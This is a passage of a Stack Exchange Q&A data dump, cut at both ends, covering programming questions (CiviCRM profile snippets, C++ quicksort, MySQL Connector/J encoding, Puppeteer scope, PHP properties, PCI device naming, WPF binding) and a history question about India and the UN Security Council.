https:\/\/r12a.github.io\/app-conversion\/\n","meta":{"source":"stackoverflow","title":"OpenType - Two Khmer chars become three before mapping to glyph Ids","dup_signals":{}},"subset":"stackexchange"} +{"text":"Why does the html snippet for a profile not include the url of the site for linked Jscript and css files?\n\nQuestion: When our users create an html snippet for a Profile, it requires a lot of editing to get the references to work. I don't understand why it's written that way.\nFor reference, here's a snippet of the code for a form that just has first name, last name and email address.\n<code><script type=\"text\/javascript\">\nvar CRM = {\"config\":{\"ajaxPopupsEnabled\":true,\"isFrontend\":\"\"}};\n<\/script> \n<script type=\"text\/javascript\" src=\"\/sites\/all\/modules\/civicrm\/packages\/jquery\/jquery-1.11.1.min.js?r=ogWA8\">\n<\/script> \n<script type=\"text\/javascript\" src=\"\/sites\/all\/modules\/civicrm\/packages\/jquery\/jquery-ui\/jquery-ui.min.js?r=ogWA8\">\n<\/script> \n<script type=\"text\/javascript\" src=\"\/sites\/all\/modules\/civicrm\/packages\/backbone\/lodash.compat.min.js?r=ogWA8\">\n<\/script> \n<script type=\"text\/javascript\" src=\"\/sites\/all\/modules\/civicrm\/packages\/jquery\/plugins\/jquery.mousewheel.min.js?r=ogWA8\">\n<\/script> \n<\/code>\nThese snippets are used on different websites than the one where CiviCRM is installed, so the local (non-absolute URL) <code>src=\"\/sites\/all\/...<\/code> references don't work correctly. \nNOTE: The Help text does indicate that this snippet should work on \"ANY website\":\nComment: Hi mark, Could you edit the question to format the code properly? quite hard to read now\nComment: It is indented - I revised it after Xavier asked that I \"format the code properly\" But the issues that you and Xavier are having with reading the code is indication of the difficulty that our end users have trying to work with the html snippet. If the experts can't read it, it presents a problem. The specific question I have with it is that all the url references are indirect. I don't see what that has to do with the formatting of the text in this question.\nComment: @PTP Mark: Please indent your code so that users can see it.\nAnswer: I found this deep in the recesses of Jira: Standalone Form HTML for Profiles has relative URL. So it was fixed back in 3.0 but must have reverted at some point. As best I can follow, Resources.php builds this via addScriptFile, which calls addScriptUrl, which calls getUrl, which creates the URL by running through the extension manager (CRM\/Extension\/system.php). I'm not sure of the \"correct\" place to add the base URL and fix this, but I'm guessing it's in the extension manager system file.\nComment: I think it's a similar issue, but slightly different. I think the form action is correctly absolute at the moment (which the bug fix you reference took care of), but all the javascript declarations are not.\nAnswer: we found that if we changed the references from \"src=\"\/sites\/all\/modules\/civicrm [...] to a complete url, it would work. An alternative solution seems to be to strip out all references to civicrm and just implement it using a form field.\nComment: Are you inserting these snippets on a different URL? Why do you need to specify the full URL? Where are you pasting the snippets?\nComment: yes, we are. the profile collects information from a non-civicrm site - the user's web site is often hosted elsewhere.\nComment: Ah ha. I've never used the Profile HTML Snippet in that way, but the help text does indicate it should be possible. I edited the question to try to make the issue clearer.\nAnswer: Check this issue in the bug tracker for some background and possible approaches to resolving this.\n","meta":{"source":"civicrm.stackexchange","title":"Why does the html snippet for a profile not include the url of the site for linked Jscript and css files?","dup_signals":{}},"subset":"stackexchange"} +{"text":"quicksort not sorting c++\n\nQuestion: I am trying to write a quicksort function to sort anywhere between 10 and 1,000,000 numbers. It iterates through everything but does not sort, just prints the vector as is.\nFor some reason it jumps out of the <code>while<\/code> loop way too soon.\nThe test input I'm using is: (3 6 2 5 1 7 9 10 4 8). \nAnd it's output: (1 2 6 5 3 7 9 10 4 8)\n<code>int main()\n{\n std::cout << \"Which file would you like to sort?\\n\";\n std::cin >> file;\n\n std::ifstream in(file.c_str());\n\n \/\/ Read all the ints from in:\n std::copy(std::istream_iterator<int>(in), std::istream_iterator<int>(),\n std::back_inserter(numbers));\n\n int max = numbers.size();\n quickSort(numbers, 0, max-1);\n\n \/\/ Print the vector with tab separators:\n std::copy(numbers.begin(), numbers.end(),\n std::ostream_iterator<int>(std::cout, \"\\t\"));\n std::cout << std::endl;\n\n return 0;\n}\n\nvoid quickSort(vector<int> &numbers, int start, int end)\n{\n int i = start;\n int j = end;\n int pivot=numbers[start];\n int temp;\n while( i != j )\n {\n while( numbers[i] < pivot && i < j)\n i++;\n while( numbers[j] >= pivot && i < j)\n j--;\n\n temp = numbers[i];\n numbers[i] = numbers[j];\n numbers[j] = temp;\n\n if( j < start )\n {\n quickSort( numbers, start, j );\n }\n\n if( i < start )\n {\n quickSort( numbers, i, end);\n }\n }\n return;\n}\n<\/code>\nComment: When you step through the program in a debugger, at what point does the actual state of the program deviate from what you expect the state to be?\nComment: once it gets to `temp = numbers[i];` it sets it to '7' and I don't quite understand why.\nAnswer: This line looks out of place:\n<code>int pivot=numbers.size()\/2;\n<\/code>\nYou're picking for your pivot the middle element of the <code>numbers<\/code> vector regardless of the <code>start<\/code> and <code>end<\/code> positions.\nComment: Yep, should be 'int pivot = numbers[(start + end) \/ 2];'\nComment: For my purpose, I believe making the middle element be the pivot makes the most sense. If I were to replace what I have with `pivot = numbers[(start + end)\/2];` it would set the pivot to be the middle element anyway with my code.\nComment: @Fourthmeal70 No the regular pivot is end-1 for the regular quicksort.\nAnswer: Possibly among other things, you aren't actually looking at the contents of the vector when you move your indices to find a swap. This section:\n<code> while( i < pivot && i < j)\n i++;\n while( j >= pivot && i < j)\n j--;\n<\/code>\nshould be changed to this:\n<code> while( numbers[i] < pivot && i < j)\n i++;\n while( numbers[j] >= pivot && i < j)\n j--;\n<\/code>\nAs one of the commenters mentioned, the bigger lesson is to learn to use a good debugger to step through your code.\nSimilarly, you should be selecting pivot as an array value. E.g. <code>pivot = numbers[start]<\/code>\nComment: It atleast sorts a couple numbers now. But now I can't figure out why its not sorting them all. I updated my question with the input and output, as well as my updated code.\nComment: Even with the fixes, I think you still have a few problems. I can't recommend enough learning to use gdb or some other debugger. In particular, I think that the two recursive calls to quicksort should be outside of the while loop - you first want to do all of the swaps, and then recurse on the two halves of the list. Second, I don't understand why you have the `if (j < start)` before recursing. I suspect that you might want a different condition there.\n","meta":{"source":"stackoverflow","title":"quicksort not sorting c++","dup_signals":{}},"subset":"stackexchange"} +{"text":"Mysql connector\/j 8.0.29 causes incorrect string exception\n\nQuestion: I am having trouble inserting utf8 string into a mysql database using 'mysql connector\/j ver 8.0.29'\nI am working on a java springboot application.\nThis problem does not happen in 'mysql connector\/j ver 8.0.27'\nAnybody encounter this problem?\n\u2014-\nMysql server is also 8.0.29 but there is no problem since I can successfully execute 'INSERT' sql command using UTF-8 on the server itself\nIt is only when sending 'INSERT' sql command via client pc using springboot that this problem happen\nServer pc OS is windows10, client pc is Windows11\nThis is my table.\n\nThis is the error.\n<code>Caused by: java.sql.SQLException: Incorrect string value: '\\x95|\\x82\\xA2\\x98b' for column 'path' at row 1\n at com.mysql.cj.jdbc.exceptions.SQLError.createSQLException(SQLError.java:129)\n at com.mysql.cj.jdbc.exceptions.SQLExceptionsMapping.translateException(SQLExceptionsMapping.java:122)\n\n<\/code>\n\nthis is the connection string:\nspring.datasource.url=jdbc:mysql:\/\/localhost\/${xpac.sql-database-name}?serverTimezone=Asia\/Tokyo\nthis is the error:\n<code>Caused by: java.sql.SQLException: Incorrect string value: '\\x95|\\x82\\xA2\\x98b' for column 'path' at row 1 at com.mysql.cj.jdbc.exceptions.SQLError.createSQLException(SQLError.java:129)\n<\/code>\n\u6016\u3044\u8a71 ---> '\\x95|\\x82\\xA2\\x98b'\nComment: Show us the connection parameters. Verify that the encoding in the client is UTF-8.\nComment: I did not set character encoding in application.properties, it uses default, which is UTF-8\nComment: mysql connector\/j 8.0.29 has this change in its release https:\/\/dev.mysql.com\/doc\/relnotes\/mysql\/8.0\/en\/news-8-0-29.html#mysqld-8-0-29-charset\nComment: anybody encounter this problem?\nComment: \"UTF-8\" is not a MySQL Character Set. Please provide the exact text of the connection. To check the client encoding, can you display the HEX of what is about to be inserted.\nComment: this is the connection string:\n\nspring.datasource.url=jdbc:mysql:\/\/localhost\/${xpac.sql-database-name}?serverTimezone=Asia\/Tokyo\nComment: I edit my post and included information regarding connection string at the bottom\nComment: This problem happens when I upgraded mysql connection\/j version from 8.0.27 to 8.0.29\nComment: In mysql connection\/j version from 8.0.27, this problem does not happen\nComment: `dirpath` is in the error message; `path` is in the image.\nComment: its `path`....not `dirpath`\nComment: I tried to use the connection string `&useUnicode=yes&characterEncoding=UTF-8`...but the error still happens\nComment: I also tried to change server settings, `my.ini` ...default-character-set = utf8mb4, character-set-server = utf8mb4....but still the error happens\nComment: The server itself when I tried to insert string in the table, there is no problem...seems its the mysql connector\/j for ver 8.0.29 is causing the problem....\nComment: If possible, dump a string from Java in hex. (I agree that the minor upgrade should not have led to the error; I am trying to figure out what is wrong now, then work backward.)\nAnswer: Somewhere in the processing, either cp932 or sjis was used.\n'Proof' -- Using either <code>CHARACTER SET<\/code> <code>cp932<\/code> or <code>sjis<\/code> in\n<code>HEX(CONVERT('\u6016\u3044\u8a71' USING ...)) => '957C82A29862'\n<\/code>\nBased on your comments it seems to be caused by a change in Connector\/J\n(No, I don't know how to fix it; but this might help in chasing it down.)\nComment: thanks for this, server has `character_set_client`, `character_set_connection`, `character_set_results` as `cp932 ` which is the default..........when I changed it to `utf8mb4`, error still happens, may be I miss something here\nComment: Presumably, the bad setting was in effect when the data was inserted in the table. Do the SELECT suggested in https:\/\/stackoverflow.com\/questions\/38363566\/trouble-with-utf8-characters-what-i-see-is-not-what-i-stored to see what is in the table. I suspect you will get 957C...\nComment: this is what happened, when I save the value just in my pc(local), the value is `??????`....but when I saved it on server (remote PC),, SQLException `Incorrect String...` happens and data is not saved in the remote database\nComment: i have found the culprit, `path` is defined as LONGTEXT in database, in the java code it was annotated as `@Lob`, this is causing the problem....without the @Lob annotation, everything is working fine.....this only happens in mysql connector\/j ver 8.0.29\nComment: @jetpack - `TEXT` has a \"character set\"; violation of that can lead to '???; or other garbage. `BLOB` blindly takes the bytes.\nAnswer: Found the cause.\nThe java application itself when run as service uses the OS default character encoding. Which is obviously not UTF-8. This causes unexpected errors when the application is interacting with a database.\nWhen running the application, it is advisable to explicitly specify that it should use UTF-8. And this is done by specifying the java option <code>Dfile.encoding=utf-8<\/code>\nPerhaps in mysql ver 8.0.27, it forces data to be saved to use UTF-8.\nThen when it was updated to mysql ver 8.0.29 this was removed and you have to specify explicitly that you will use UTF-8 encoding.\n","meta":{"source":"stackoverflow","title":"Mysql connector\/j 8.0.29 causes incorrect string exception","dup_signals":{}},"subset":"stackexchange"} +{"text":"Did India turn down a permanent seat in the UN in 1955?\n\nQuestion: As per this article, India was offered a permanent seat on the UN Security Council in 1955 but Jawaharlal Nehru turned it down and the seat went to China. In light of the current lobbying that India is making for a permanent seat, what prompted Nehru to turn it down?\nUpdate: As per this news item, India did not receive any offer. So I believe the question becomes, who to believe, The Washington Post or The Hindu?\nComment: Note that Nehru was big on friendship with China (at least till 62), and this might have been a token of friendship.\nAnswer: From independent sources, I'd go with the India.com version: India never received any such offer.\nThe UN actually existed during WW2. This is what the group of countries allied against the Axis powers called themselves. The Security Council was the group of countries that were actually the major allies supplying large numbers of troops in the fight, and thus needed to periodically get together to coordinate grand strategic war plans. If you read Churchill's history of WWII, he mentioned that China was included in these meetings because they were actively fighting Japan (in a way, those two were the first belligerents of the war) and Roosevelt insisted they be included. I get the impression Churchill didn't share Roosevelt's view of the value of Chinese involvement. However, their relative feelings about France were essentially mirror images of this, so both France and China were put on as sort of a compromise.\nThis explains why votes from permanent members of the Security Council of the UN require unanimity. During the war, it would have been actively harmful to the UN alliance (which had to be maintained if they hoped to survive) for one group of members to engage in a major action the rest were dead set against. \nAfter the war, some of these countries became enemies with each other, so there was no way they'd agree to change the rules in a way that significantly lessened their own power. This is why this little club has never really changed, and the \"non-permanent\" members do not get vetoes. This is also why I highly doubt there ever was (or ever will be) any real offer to add India, or anybody else.\nIn short, permanent membership is not a statement of your country's value or size or anything. At this point its just a historical accident.\nComment: Personal note: I'm not advocating the status quo here, just explaining it. It would actually make a lot of sense IMHO to take the UK and French seats and just give them a single permanent \"EU\" seat, and then give India a permanent seat. However, I'm sure the UK and France would be horrified at this idea. Probably China would be too, for different reasons. So I highly doubt any such thing will ever happen.\nComment: Besides, for a series of reasons too long to be summarized in a comment, it is unlikely that India will ever have a place at the UN SC *before* settling all border disputes with China and (especially) with Pakistan.\nComment: Sorry, but this is alternative history. There was no security council and the United Nations Organization during WWII.\nComment: @Anixx There is nothing in this answer saying that *UN organisation* existed, though? \"The UN actually existed during WW2. This is what the group of countries allied against the Axis powers called themselves.\" - this is [correct](https:\/\/en.wikipedia.org\/wiki\/Declaration_by_United_Nations). On the other hand, might be good to change the wording to make it obvious that there was no body calling itself Security Council *at the time*.\nComment: Are you saying that the UN literally existed during WW II or are you referring to the [Combined Chiefs of Staff](http:\/\/en.wikipedia.org\/wiki\/Combined_Chiefs_of_Staff) by analogy? I am not (yet) aware of usages that equate the two terms.\nComment: There was the [Declaration by United Nations - Wikipedia](https:\/\/en.wikipedia.org\/wiki\/Declaration_by_United_Nations): *The Declaration by United Nations became the basis of the United Nations (UN), which was formalized in the UN Charter, signed by 50 countries on 26 June 1945.* See also: [Founding Members - UN Membership - Research Guides at United Nations Dag Hammarskj\u00f6ld Library](https:\/\/research.un.org\/en\/unmembers\/founders)\nAnswer: China had a permanent seat since 1945\n\nAs one of the \"Big Four\" allies in World War II (China, the Soviet Union, the United Kingdom, and the United States), the Republic of China (ROC) was one of the founding members of the United Nations. President Franklin Roosevelt had acknowledged China's war effort in World War II and stated his desire to allow China to \"play its proper role in maintaining peace and prosperity\" in the world, even though China was not socially influential or militarily strong1. Thus, despite opposition from other leaders, especially Winston Churchill, [3] China became a permanent member of the Security Council from its creation in 1945.\n\nHowever after the Chinese Civil War, China was represented by the Republic of China (Taiwan) in the UN until 1971. \nAs for India being offered a seat in the UN in 1955 - I don't know how true that is but there is another reference from 2008 mentioning the same thing. I'm not sure how trustworthy that reference is though. In addition the term \"offer\" is very vague - it could simply mean that the US indicated support for an Indian permanent membership. If the UN had formally agreed to let India in, it would have been very big news probably requiring a vote in the General Assembly. So it's pretty much impossible that India had the choice of taking a permanent seat in the council in 1955.\nIf the incident (in whatever form) did happen though, then Nehru probably meant that the People's Republic of China (mainland China) should be given permanent representation in the Security Council as part of an ongoing effort at that time to improve Indo-Chinese relations. \nComment: +1 For the distinction on China, THAT always gets confused by people as to the ROC and PRoC.\nComment: As another answer points out, [Nehru himself clarified in Parliament that no such offer was made](https:\/\/www.thehindu.com\/todays-paper\/tp-miscellaneous\/dated-september-28-1955-un-seat-nehru-clarifies\/article27479637.ece) - since your answer is the accepted one, please update it with this fact.\nAnswer: Late Prime Minister Nehru himself has explicitly stated in Parliament that India was not offered a permanent membership on the UN Security Council.\nNews item from \"The Hindu\" (dated September 28, 1955) -\nUN seat: Nehru clarifies:\n\nPrime Minister Nehru has categorically denied any offer, formal or informal, having been received about a seat for India in the UN Security Council. He made this statement in reply to a short notice question in the Lok Sabha on September 27 by Dr. J.N. Parekh whether India had refused a seat informally offered to her in the Security Council.\nThe Prime Minister said: \"There has been no offer, formal or informal, of this kind. Some vague references have appeared in the press about it which have no foundation in fact. The composition of the Security Council is prescribed by the UN Charter, according to which certain specified nations have permanent seats. No change or addition can be made to this without an amendment of the Charter. There is, therefore, no question of a seat being offered and India declining it. Our declared policy is to support the admission of all nations qualified for UN membership.\"\n","meta":{"source":"history.stackexchange","title":"Did India turn down a permanent seat in the UN in 1955?","dup_signals":{}},"subset":"stackexchange"} +{"text":"xml Element Tree : fail to get expected output\n\nQuestion: I am using xml.ElementTree to loop through a python list and write it to an xml file in a tree structure. Here is the following code and follows the desired output. Can any1 please help me!!\n<code>import xml.etree.ElementTree as ET\nsample = ['germany','India','USA','srilanka']\n\nroot = ET.Element(\"root\")\ndata = ET.SubElement(root, \"data\")\ntitle = ET.SubElement(data, \"country\")\nfor a in sample:\n title.text = a\n data.append('title')\n\ntree = ET.ElementTree(root)\ntree.write(\"page.xml\")\n<\/code>\nCurrent output\n<code>- <root>\n <data>\n <country>srilanka<\/country> \n <country>srilanka<\/country> \n <country>srilanka<\/country> \n <country>srilanka<\/country> \n <country>srilanka<\/country> \n <\/data>\n <\/root>\n\nExpected output\n <root>\n <data>\n <country>germany<\/country> \n <country>india<\/country> \n <country>usa<\/country> \n <country>srilanka<\/country> \n <\/data>\n <\/root>\n<\/code>\nI need the output in this fashion...help me !!\nThanks in advance!\nAnswer: The problem is, that you append always the same element, which gets modified to reflect the final value. Note, that append works with a reference, not with a snapshot copy as you seem to expect. Easiest fix is, to create a new subelement instance for each country.\n","meta":{"source":"stackoverflow","title":"xml Element Tree : fail to get expected output","dup_signals":{}},"subset":"stackexchange"} +{"text":"Node require constant undefined inside function\n\nQuestion: I am working in Node (commonjs) and I have a <code>const<\/code> that I am grabbing with <code>require<\/code> and <code>module.exports<\/code> and it is coming through fine within one function but once I'm inside a function in the function, it is all of a sudden undefined.\nmain.js\n<code>const SRLoginCredentials = require('.\/secrets.js');\n\nconst puppeteer = require('puppeteer-extra');\n\n\/\/ Add stealth plugin and use defaults\nconst pluginStealth = require('puppeteer-extra-plugin-stealth');\nconst { executablePath } = require('puppeteer');\n\n\/\/ Use stealth\npuppeteer.use(pluginStealth());\n\n\/\/ Launch puppeteer-stealth\npuppeteer.launch({ headless: false, executablePath: executablePath() }).then(async (browser) => {\n \/\/ Create a new page\n const page = await browser.newPage();\n\n \/\/ Go to the website\n await page.goto('https:\/\/google.com');\n\n \/\/ Wait for security check\n await page.waitForTimeout(2000);\n\n await page.waitForSelector('#APjFqb');\n console.log(SRLoginCredentials); \/\/ SRLoginCredentials is defined\n \n await page.$eval('#email', (el) => (console.log(SRLoginCredentials)); \/\/ SRLoginCredentials is undefined\n\n await browser.close();\n});\n<\/code>\nsecrets.js\n<code>const SRLoginCredentials = {\n email: 'firstname.lastname@example.com',\n password: 'some_pass',\n};\n\nmodule.exports = SRLoginCredentials;\n<\/code>\npackage.json\n<code>\"type\": \"commonjs\",\n<\/code>\nAny insight into why that's happening would be much appreciated!\nComment: The function passed to eval is evaluated in the browser's context, so the node context isn't being captured as one would suppose. Pass what you need, like SRLoginCredentials, as additional params to eval. See https:\/\/stackoverflow.com\/a\/59899999\/294949.\nAnswer: @danh answered my question perfectly in a comment above!\n","meta":{"source":"stackoverflow","title":"Node require constant undefined inside function","dup_signals":{}},"subset":"stackexchange"} +{"text":"PHP private variable is 'undefined' though it is defined\n\nQuestion: I've been toying with a RuneScape hiscore image creator. People tend to use these for signatures on their profiles on forums.\nWhile reworking some of the code, I broke it. I'm getting:\n\nUndefined variable: exp in \/assets\/user.php on line 8\n Fatal error: Cannot access empty property in \/assets\/user.php on line 8\n\nHowever, the variable isn't even on line 8 (I assume that's something to do with it trimming white space).\nHere is my User.php file\n<code><?php\n\nclass User {\n\npublic static $names = [\"Overall\", \"Attack\", \"Defence\", \"Strength\", \"Hitpoints\", \"Ranged\", \"Prayer\", \"Magic\", \"Cooking\",\n\"Woodcutting\", \"Fletching\", \"Fishing\", \"Firemaking\", \"Crafting\", \"Smithing\", \"Mining\",\"Herblore\", \"Agility\", \"Thieving\", \"Slayer\",\n\"Farming\", \"Runecrafting\", \"Hunter\", \"Construction\", \"Summoning\",\"Dungeoneering\", \"Divination\", \"Invention\"];\n\nprivate $user;\nprivate $mySkills = [];\nprivate $exp = [];\n\npublic function __construct($result) {\n $array = explode(\",\", $result);\n $id = 0;\n $arrId = 1;\n while($arrId < count($result)) {\n $this->$mySkills[$id] = $array[$arrId++];\n $temp = explode(\" \", $array[$arrId++]);\n $this->$exp[$id++] = $array[0];\n }\n}\n\npublic function getTotalXp() {\n return $this->$exp[0];\n}\n\npublic function getLevel($skill) {\n global $names;\n for ($x = 0; $x <= count($names); $x++) {\n if(strcasecmp($skill, $names[$x]) == 0) {\n return $this->$mySkills[$x];\n }\n }\n return 0;\n}\n\npublic function getExp($skill) {\n global $names;\n for ($x = 0; $x <= count($names); $x++) {\n if(strcasecmp($skill, $names[$x]) == 0) {\n return $this->$exp[$x];\n }\n }\n return 0;\n}\n}\n?>\n<\/code>\nI was getting errors with the $names but that was because I wasn't using global $names in the functions.\nComment: `$this->$mySkills` and `$this->$exp` is a __wrong__ syntax\nComment: ...and write your object's properties as: `$this->mySkills`, `$this->exp`, and so on\nAnswer: You're using the wrong syntax.\nUse <code>$this->variableName<\/code> not <code>$this->$variableName<\/code>\ni.e. change <code>return $this->$exp[0];<\/code> to <code>return $this->exp[0];<\/code>\nComment: I'm now getting undefined index errors for index 0 for my array(s). Though they should be set in the constructor, what'd be a good way to see they're being set?\nComment: After you create an instance of the User class, use the getter methods to see if anything is set.\nComment: It's showing it's not set. How should I be setting the variables within the constructor so they work with the instance of the class? Right now the instance is: `$user = new User($result);`, and mySkills\/exp should be set in the constructor, but are not. I added `echo 'Setting ' . $id . ' to ' . $array[$arrId]` to the constructor and nothing is displaying on the page.\nComment: Did you change all of the wrong syntax? It's also wrong within the `while()` loop, not just the getter methods.\nComment: Yes, I've actually got it down to another error. The problem with it being set was the `count($result)` should have used `$array`. Now I'm getting \"A non well formed numeric value encountered\" because `$temp = explode(\" \", $array[$arrId++]);` isn't setting the temp[0] correctly. I used an echo to see what it's being set as, and it's taking both values, I.E: `447663457 35892` when it should only have `447663457`\nComment: I've finally fixed all the errors. Ended up using `preg_split` instead of explode.\n","meta":{"source":"stackoverflow","title":"PHP private variable is 'undefined' though it is defined","dup_signals":{}},"subset":"stackexchange"} +{"text":"Profile only works for logged in users\n\nQuestion: I Have created a membership directory and it works fine when I am logged in but as soon as i log out I get this message - \nThe requested Profile (gid=1) is disabled OR it is not configured to be used for 'Profile' listings in its Settings OR there is no Profile with that ID OR you do not have permission to access this profile. Please contact the site administrator if you need assistance.\ni am using Wordpress\nCan someone advise me of a fix :(\nThanks ... I am new to CiviCRM\nAnswer: https:\/\/docs.civicrm.org\/user\/en\/latest\/organising-your-data\/profiles\/ has all the details you should need:\n\nVisibility: If the Profile is being used for a searchable directory, set the Visibility of any fields you want to include on the search form to Public Pages or Public Pages and Listings. For fields that will be used on sign-up forms, set Visibility to User and User Admin only. This ensures that other visitors to the form can't view any data from the database. To use fields for Search Views, you must set Visibility to Public Pages or Public Pages and Listings. Choosing either of the Public Page options pops up two additional settings:\nComment: Many thanks for the prompt response ... I had already done that :( for the fields in the profile so its something else ... cheers\nComment: CMS permissions would be the only other thought then eg 'access all custom fields'?\nComment: oh, also you have said what settings you put on the Profile itself. I had perhaps wrongly assumed you were talking about the fields\n","meta":{"source":"civicrm.stackexchange","title":"Profile only works for logged in users","dup_signals":{}},"subset":"stackexchange"} +{"text":"Are devices on pci bus always probed in the same order?\n\nQuestion: I have 2 wireless pci cards (same model, but can work under 2 different modes) on the bus. They share the same driver. What I want to do is to hack the driver like this: check the pci index, the first probed device (index 0) will be configured as mode A, the next one (index 1) will be configured as mode B.\nso I want to know if they are probed in the same order every time the system init.\nIf the probe order is random, is there any other way can do that?\n\nI tried this: plug the same card into difference slots, and check what I got under \/sys\/devices\/pci0000:00. the result are all the same. \nso the kernel know nothing about the physical slot at all? I was thinking maybe the kernel know which physical slot the card was mounted on. pity..\nAnswer: To answer: No, they are not in general.\nTo what you are trying to resolve: No need to do that since it's fixed in modern kernels Linux systems, The name of network interface is linked to the physical slot of the device. You will always have same names until you physically move the cards.\nCorrection. Initially I thought that this is provided by kernel. No, it's provided by user space helper, i.e. udev.\n\nNames incorporating Firmware\/BIOS provided index numbers for on-board devices (example: eno1)\nNames incorporating Firmware\/BIOS provided PCI Express hotplug slot index numbers (example: ens1)\nNames incorporating physical\/geographical location of the connector of the hardware (example: enp2s0)\nNames incorporating the interfaces's MAC address (example: enx78e7d1ea46da)\nClassic, unpredictable kernel-native ethX naming (example: eth0)\n\nOrigin: https:\/\/www.freedesktop.org\/wiki\/Software\/systemd\/PredictableNetworkInterfaceNames\/\nExample:\n<code>% ip link list dev enp0s20u2c2\n42: enp0s20u2c2: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP mode DEFAULT group default qlen 1000\n link\/ether 4a:06:8b:65:72:36 brd ff:ff:ff:ff:ff:ff\n% ls -l \/sys\/class\/net\/enp0s20u2c2\nlrwxrwxrwx 1 root root 0 Dec 23 14:59 \/sys\/class\/net\/enp0s20u2c2 -> ..\/..\/devices\/pci0000:00\/0000:00:14.0\/usb1\/1-2\/1-2:2.0\/net\/enp0s20u2c2\n<\/code>\nComment: yes. devA->wl0->Mode A. devB->wl1 ->Mode B. that's what I'm trying to do. but I don't understand \"it's fixed in modern kernels\". if their device idx (probed) are random, how could the kernel do the static mapping? I'm sure the 1st probed dev is named wl0, but the 1srt dev can be either devA or devB, right?\nComment: Because physically devices are connected to specific slots. I'm going to update the answer to show an example.\n","meta":{"source":"stackoverflow","title":"Are devices on pci bus always probed in the same order?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Get TextBox Value in ViewModel\n\nQuestion: Anyone one please tell me with example ,how to get textbox value in View Model, My model property is already Binding with textbox with Mode Two Way\n\nThis is my view model functions, I want to add new record to my observable collection.\nC#\n<code>public void AddPerson()\n{\n \/\/ add new record\n}\n\nprivate Model.Person _PersonData;\npublic Model.Person PersonData\n{\n get {\n if(_PersonData==null)\n {\n _PersonData = new Person();\n }\n return _PersonData;\n }\n set\n {\n Setproperty(ref this._PersonData, value);\n }\n}\n<\/code>\nXAML\n<code><Controls:MetroWindow\n xmlns=\"http:\/\/schemas.microsoft.com\/winfx\/2006\/xaml\/presentation\"\n xmlns:x=\"http:\/\/schemas.microsoft.com\/winfx\/2006\/xaml\"\n xmlns:Controls=\"clr-namespace:MahApps.Metro.Controls;assembly=MahApps.Metro\"\n xmlns:VM=\"clr-namespace:Demo.ViewModel\"\n xmlns:d=\"http:\/\/schemas.microsoft.com\/expression\/blend\/2008\" xmlns:mc=\"http:\/\/schemas.openxmlformats.org\/markup-compatibility\/2006\" xmlns:Model=\"clr-namespace:Demo.Model\" mc:Ignorable=\"d\" x:Class=\"Demo.MainWindow\"\n Title=\"MainWindow\" Height=\"438\" Width=\"664\"\n GlowBrush=\"{DynamicResource AccentColorBrush}\" \n WindowStartupLocation=\"CenterScreen\">\n<Controls:MetroWindow.Resources>\n <Model:Person x:Key=\"PersonDataSource\" d:IsDataSource=\"True\"\/>\n <VM:MainViewModel x:Key=\"MainViewModelDataSource\" d:IsDataSource=\"True\"\/>\n<\/Controls:MetroWindow.Resources>\n\n <Controls:MetroWindow.RightWindowCommands>\n <Controls:WindowCommands>\n <!--<Button Content=\"settings\" \/>-->\n <Button>\n <StackPanel Orientation=\"Horizontal\">\n <Rectangle Width=\"20\"\n Height=\"20\"\n Fill=\"{Binding Foreground, RelativeSource={RelativeSource AncestorType={x:Type Button}}}\">\n <Rectangle.OpacityMask>\n <VisualBrush Stretch=\"Fill\" Visual=\"{StaticResource appbar_futurama_fry}\" \/>\n <\/Rectangle.OpacityMask>\n <\/Rectangle>\n <TextBlock Margin=\"4 0 0 0\"\n VerticalAlignment=\"Center\"\n Text=\"Karthik\" \/>\n <\/StackPanel>\n <\/Button>\n <\/Controls:WindowCommands>\n<\/Controls:MetroWindow.RightWindowCommands>\n\n<Grid DataContext=\"{Binding Source={StaticResource MainViewModelDataSource}}\">\n <Grid.Background>\n <LinearGradientBrush EndPoint=\"0.5,1\" StartPoint=\"0.5,0\">\n <GradientStop Color=\"#FFF3F3F3\" Offset=\"0\"\/>\n <GradientStop Color=\"#FFFBF9F9\" Offset=\"1\"\/>\n <GradientStop Color=\"#FFF7F6F6\" Offset=\"0.555\"\/>\n <\/LinearGradientBrush>\n <\/Grid.Background>\n <Border BorderThickness=\"3\" HorizontalAlignment=\"Left\" Height=\"388\" Margin=\"10,10,0,0\" VerticalAlignment=\"Top\" Width=\"636\" CornerRadius=\"3\">\n <Border.Background>\n <LinearGradientBrush EndPoint=\"0.168,0.166\" StartPoint=\"0.168,0.08\">\n <GradientStop Color=\"#FF39D5FF\" Offset=\"0\"\/>\n <GradientStop Color=\"White\"\/>\n <\/LinearGradientBrush>\n <\/Border.Background>\n <Label Content=\"Master Details\" Margin=\"10,1,502,352\" FontWeight=\"Bold\" Foreground=\"White\"\/>\n <\/Border>\n\n <Border BorderBrush=\"#FFC7C2C2\" BorderThickness=\"1\" HorizontalAlignment=\"Left\" Height=\"238\" Margin=\"21,100,0,0\" VerticalAlignment=\"Top\" Width=\"187\" CornerRadius=\"3\">\n <Border.Background>\n <LinearGradientBrush EndPoint=\"0.433,0.407\" StartPoint=\"0.435,0.134\">\n <GradientStop Color=\"#29c5ff\" Offset=\"0\"\/>\n <GradientStop Color=\"White\"\/>\n <\/LinearGradientBrush>\n <\/Border.Background>\n <\/Border>\n <Border BorderBrush=\"#FFC7C2C2\" BorderThickness=\"1\" HorizontalAlignment=\"Left\" Height=\"239\" Margin=\"227,100,0,0\" VerticalAlignment=\"Top\" Width=\"405\" CornerRadius=\"3\">\n <Border.Background>\n <LinearGradientBrush EndPoint=\"0.435,0.378\" StartPoint=\"0.435,0.134\">\n <GradientStop Color=\"#29c5ff\" Offset=\"0\"\/>\n <GradientStop Color=\"White\"\/>\n <\/LinearGradientBrush>\n <\/Border.Background>\n <Button Content=\"DELETE\" Margin=\"211,189,41,21\" Width=\"149\" Height=\"21\"\/>\n <\/Border>\n <Label Content=\"New\" HorizontalAlignment=\"Left\" Height=\"29\" Margin=\"37,103,0,0\" VerticalAlignment=\"Top\" Width=\"87\" Foreground=\"White\"\/>\n <Label Content=\"Update\" HorizontalAlignment=\"Left\" Height=\"25\" Margin=\"246,105,0,0\" VerticalAlignment=\"Top\" Width=\"98\" Foreground=\"White\"\/>\n <TextBox HorizontalAlignment=\"Left\" Height=\"25\" Margin=\"37,150,0,0\" TextWrapping=\"Wrap\" Text=\"{Binding Path=Name,Mode=TwoWay,UpdateSourceTrigger=PropertyChanged}\" 